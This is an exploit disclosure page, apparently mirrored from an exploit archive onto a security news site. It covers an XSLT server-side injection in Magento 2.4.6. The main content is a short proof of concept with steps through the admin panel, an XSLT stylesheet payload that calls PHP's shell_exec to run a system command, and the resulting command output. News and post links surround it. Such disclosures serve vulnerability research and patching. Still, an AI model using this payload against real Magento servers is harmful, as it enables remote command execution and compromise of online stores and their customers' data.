Home Tools Exploits & CVE's Magento 2.4.6 XSLT Server Side Injection / Command Execution

Magento 2.4.6 XSLT Server Side Injection / Command Execution

November 25, 2023

180

Authored by tmrswrr

Magento version 2.4.6 suffers from an XSLT server side injection vulnerability that allows for remote command execution.

Change Mirror Download

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
# Date: 2023-11-17
# Exploit Author: tmrswrr
# Vendor Homepage: https://magento2demo.firebearstudio.com/
# Software Link:  https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip
# Version: 2.4.6
# Tested on: 2.4.6

POC:

1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/
2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 
3 ) Click XSLT Configuration  and write this payload : 

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />
</xsl:template>
</xsl:stylesheet>

4 ) Click Test XSL Template , You will be see "id" command result :

<?xml version="1.0"?>
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Magento 2.4.6 XSLT Server Side Injection / Command Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

Federal agencies helping Catholic health network amid cyberattack

Cyberthreat landscape permanently altered by Chinese operations, US officials say

In interview, LockbitSupp says authorities outed the wrong guy

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Backdoor.Win32.Jeemp.c MVID-2024-0672 Hardcoded Credential

Online Project Time Management 1.0 SQL Injection

Pet Shop Management System 1.0 Privilege Escalation / Shell Upload